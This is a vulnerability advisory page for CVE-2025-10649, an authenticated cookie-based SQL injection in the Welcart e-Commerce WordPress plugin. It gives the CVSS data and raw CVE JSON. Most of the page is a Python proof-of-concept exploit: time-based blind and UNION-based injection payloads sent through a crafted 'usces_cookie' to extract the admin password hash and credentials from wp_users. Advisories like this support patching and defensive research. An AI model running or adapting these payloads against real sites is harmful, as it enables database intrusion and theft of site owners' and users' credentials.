Security Vulnerability Report
中文
CVE-2025-10649 CVSS 6.5 MEDIUM

CVE-2025-10649

Published: 2025-10-08 12:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Welcart e-Commerce plugin for WordPress is vulnerable to SQL Injection via the cookie in all versions up to, and including, 2.11.21 due to insufficient escaping on the user supplied value and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Welcart e-Commerce(usc-e-shop)<= 2.11.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC # Vulnerability: Cookie-based SQL Injection in Welcart e-Commerce plugin # Affected versions: <= 2.11.21 # Required privilege: Author-level access or above import requests import sys TARGET_URL = "http://target-wordpress-site.com" AUTH_COOKIE = "wordpress_logged_in_xxxxx=your_auth_cookie_here" # Author-level session cookie def exploit_sqli(target_url, auth_cookie, injection_payload): """ Exploit the SQL injection vulnerability via Cookie manipulation. The vulnerable parameter is within a cookie value processed by the plugin. """ # Craft the malicious cookie with SQL injection payload malicious_cookie = f"usces_cookie={injection_payload}; {auth_cookie}" headers = { "Cookie": malicious_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } # Trigger the vulnerable code path response = requests.get(target_url, headers=headers) return response def extract_data_time_based(target_url, auth_cookie): """ Time-based blind SQL injection to extract sensitive data. Example: Extract admin password hash character by character. """ extracted = "" for position in range(1, 50): for ascii_val in range(32, 127): # MySQL time-based blind injection payload # IF condition checks each character of the admin password hash payload = f"1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{position},1))={ascii_val},SLEEP(2),0)-- -" import time start_time = time.time() response = exploit_sqli(target_url, auth_cookie, payload) elapsed = time.time() - start_time if elapsed >= 2: # If SLEEP triggered, we found the character extracted += chr(ascii_val) print(f"[+] Position {position}: {chr(ascii_val)} (Hash so far: {extracted})") break else: break return extracted def extract_data_union_based(target_url, auth_cookie): """ UNION-based SQL injection to extract data directly. """ # First determine the number of columns for cols in range(1, 15): nulls = ",".join(["NULL"] * cols) payload = f"1' UNION SELECT {nulls}-- -" response = exploit_sqli(target_url, auth_cookie, payload) if response.status_code == 200: print(f"[+] Number of columns: {cols}") break # Extract admin credentials payload = f"1' UNION SELECT user_login,user_pass,user_email,{','.join(['NULL']*(cols-3))} FROM wp_users WHERE ID=1-- -" response = exploit_sqli(target_url, auth_cookie, payload) print(f"[+] Response: {response.text[:500]}") if __name__ == "__main__": print("[*] CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC") print("[*] This PoC requires Author-level authenticated access") # Example usage (uncomment to use): # extract_data_time_based(TARGET_URL, AUTH_COOKIE) # extract_data_union_based(TARGET_URL, AUTH_COOKIE) print("[*] Please configure TARGET_URL and AUTH_COOKIE before running")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10649", "sourceIdentifier": "[email protected]", "published": "2025-10-08T12:15:36.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Welcart e-Commerce plugin for WordPress is vulnerable to SQL Injection via the cookie in all versions up to, and including, 2.11.21 due to insufficient escaping on the user supplied value and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3374119/usc-e-shop", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d59eedb-550f-44c1-a0cd-609c5661134d?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.